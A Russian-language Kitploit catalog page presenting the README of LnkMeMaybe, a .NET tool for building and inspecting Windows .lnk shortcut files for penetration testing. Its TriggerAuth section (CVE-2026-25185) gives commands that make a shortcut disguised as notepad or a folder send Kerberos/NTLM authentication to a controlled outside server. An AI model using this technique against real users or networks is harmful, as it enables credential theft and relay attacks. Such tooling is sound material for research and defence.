Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
LnkMeMaybe — Инструменты для создания и исследования LNK-файлов | Kitploit
Инструменты/GitHubGitHub/trustedsec/lnkmemaybe
Генерация полезной нагрузкиЭксплуатацияЦифровая криминалистикаТестирование на ПроникновениеСоциальная инженерияАнализ Бинарных Файлов
GitHubtrustedsec/lnkmemaybe

LnkMeMaybe

Инструменты для создания и исследования LNK-файлов

Репозиторий
1851156 месяцев назадПроверено Kitploit
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

LnkMeMaybe

Инструментарий .NET 8 для создания и анализа файлов Windows Shell Link (.lnk). Включает консольный конструктор (LnkMeMaybe) и графический редактор (LnkUi). Предназначен для исследований в области безопасности и тестирования на проникновение.


Проекты

ПроектОписание
Lnk/Базовая библиотека. Разбирает и генерирует .lnk-файлы в бинарном формате в соответствии со спецификацией MS-SHLLINK. LnkHandler — основная точка входа, объединяющая ShellLinkHeader, LinkTargetIDList, LinkInfo, StringData и ExtraData.
LnkMeMaybe/CLI-инструмент. Команды для генерации разнообразных .lnk-файлов. Использует фреймворк Titanis.Cli.
LnkUi/Настольный редактор на Avalonia 11 с архитектурой MVVM. Семь ViewModel оборачивают соответствующие компоненты библиотеки Lnk. Полезен для ручного изучения и проверки .lnk-файлов.
LnkTests/Набор тестов MSTest. Реальные образцы .lnk-файлов встроены в качестве ресурсов. Покрывает ShellLinkHeader и LinkInfo.

CLI — LnkMeMaybe

Общие параметры

Все команды используют следующие базовые параметры (из BaseSavedCommand):

ПараметрПсевдонимОбязательныйОписание
--OutputPathДаПуть в файловой системе для записи .lnk-файла.
--OverwriteНетРазрешает перезапись существующего файла по пути OutputPath.
--DisplayNameНетТекст, отображаемый при наведении курсора на ярлык. Поддерживает \n для перевода строки.
--IconPath / -I-IНетПуть к .exe- или .dll-файлу, используемому в качестве значка ярлыка. Должен существовать на целевой системе.
--IconIndexНетИндекс ресурса значка в файле, указанном через --IconPath. По умолчанию: 0.

TriggerAuth (CVE-2026-25185)

Создаёт .lnk-файл, который запускает аутентификацию Kerberos (с переходом на NTLM) к указанному серверу. Сам .lnk не выполняет никакого кода.

Сценарии, при которых запускается аутентификация:

  1. Пользователь открывает общий ресурс, содержащий .lnk, — учётная запись пользователя проходит исходящую аутентификацию.
  2. .lnk размещён в месте, которое машина настроена индексировать, — SearchProtocolHost аутентифицируется как SYSTEM.
  3. MSSense запущен, а расположение не входит в исключения, — MSSense.exe аутентифицируется как SYSTEM.

Параметры:

ПараметрПсевдонимОбязательныйОписание
--FakePath / -F-FДаПуть, отображаемый как цель в свойствах .lnk.
--Server / -S-SДаИмя хоста сервера, IP-адрес или UNC-путь для отправки аутентификации. Добавляет IPC$, если общий ресурс не указан.
--DarwinНетИдентификатор Darwin, хранящийся в .lnk. Может быть любым значением. По умолчанию: unset.

Примеры:

root@kitploit:~
# Send authentication to \\controlled.example.org\IPC$ while posing as notepad
LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -DisplayName notepad.exe -I C:\Windows\notepad.exe -OutputPath notepad.lnk

# Send authentication to a specific share path while posing as a folder shortcut
LnkMeMaybe.exe TriggerAuth -F C:\Users\Public -S \\controlled.example.org\validshare\somefile.txt -DisplayName C:\Users\Public -I C:\Windows\system32\imageres.dll -IconIndex 3 -OutputPath Public.lnk

WebShortcut

Создаёт .lnk-файл, указывающий на веб-URL. Обычно Windows создаёт .url-файл для веб-ярлыков; эта команда вместо этого создаёт .lnk.

Параметры:

ПараметрОбязательныйОписание
--UrlДаURL, на который должен указывать ярлык. Должен быть корректно сформированным абсолютным URI.

Пример:

root@kitploit:~
LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk

LocalShortcut

Создаёт стандартный ярлык Windows на локальный файл или папку. Путь к цели хранится в виде списка идентификаторов элементов оболочки (PIDL) — собственного формата, который Windows использует для ярлыков на элементы файловой системы.

Параметры:

ПараметрПсевдонимОбязательныйОписание
--TargetPathДаАбсолютный путь к целевому файлу или папке.
--ArgumentsНетАргументы командной строки, передаваемые цели.
--WorkingDirectory-WНетРабочий каталог целевого процесса.
--RunAsAdminНетЗапрашивать повышение прав UAC при запуске ярлыка.
--ShowCommandНетСостояние окна при запуске: Normal, Maximized или Minimized.

Примеры:

root@kitploit:~
# Create a shortcut to Notepad
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk

# Shortcut with arguments and a custom icon
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --Arguments myfile.txt --WorkingDirectory C:\Users\Public --OutputPath notepad.lnk -I C:\Windows\notepad.exe

# Shortcut that opens maximised and requests elevation
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\System32\cmd.exe --ShowCommand Maximized --RunAsAdmin --OutputPath cmd_admin.lnk

EnvShortcut

Создаёт .lnk, в котором путь к цели хранится в виде разворачиваемой строки с переменными окружения (EnvironmentVariableDataBlock). Это формат, который Windows использует для ярлыков на системные исполняемые файлы (например, %SystemRoot%\system32\notepad.exe). Переменные раскрываются в момент запуска, что делает ярлык переносимым между установками Windows.

Параметры:

ПараметрПсевдонимОбязательныйОписание
--TargetPathДаПуть к цели; может включать переменные окружения, например %SystemRoot% или %USERPROFILE%.
--ArgumentsНетАргументы командной строки, передаваемые цели.
--WorkingDirectory-WНетРабочий каталог целевого процесса.
--RunAsAdminНетЗапрашивать повышение прав UAC при запуске ярлыка.
--ShowCommandНетСостояние окна при запуске: Normal, Maximized или Minimized.

Примеры:

root@kitploit:~
# Shortcut to Notepad using an environment variable path
LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk

# Shortcut to a user-profile app with arguments
LnkMeMaybe.exe EnvShortcut --TargetPath "%LOCALAPPDATA%\MyApp\app.exe" --Arguments "--config default" --WorkingDirectory "%USERPROFILE%" --OutputPath myapp.lnk

Сборка

root@kitploit:~
# Build (debug)
dotnet build Lnk.sln

# Build (release, core projects only)
dotnet build -c Release build.slnf

# Run all tests
dotnet test

# Run a specific test class
dotnet test --filter "ClassName=lnkHeader"

# Publish self-contained single-file executable (Windows x64)
dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj

Релизы

Готовые сборки для Windows, Linux и macOS (x64 и arm64) доступны на странице Релизы.

Каждый релиз включает сборки LnkMeMaybe и LnkUi в двух вариантах: автономные (не требуют среды выполнения .NET) и зависящие от платформы (требуют среду выполнения .NET 8).

Раскрытие информации об использовании ИИ

ИИ-системы использовались для следующих задач:

  • Проверка качества кода
  • Генерация файла Readme
  • Действия в Github workflow

Весь остальной код в этом репозитории был создан и проверен человеком.

Скачать инструмент